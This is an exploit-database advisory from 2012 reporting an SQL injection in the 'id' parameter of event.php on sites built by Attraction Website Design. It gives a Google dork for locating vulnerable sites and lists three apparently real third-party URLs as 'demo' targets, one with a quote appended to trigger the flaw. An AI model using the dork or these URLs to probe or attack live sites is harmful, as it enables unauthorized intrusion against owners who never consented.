id: 19376
date: 09/10/2012
title: Attraction Website Design SQL Injection Vulnerability
author: The Black Devils
cves: 

# Exploit Title:Attraction Website Design sql injection  Vulnerability
# Date: 08/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.attractweb.com/
# Category : [ webapps ]
# Google dork: Site by Attraction Website Design inurl:event.php?id=
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\event.php?id= [sql Injection]
-------------------------------
# Demo site:

http://www.runningmyraces.com/event.php?id=189
http://www.runningmyraces.com/event.php?id=1102
http://llangollen-railway.co.uk/event.php?id=84'


-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



#  0day.today [2023-03-25]  #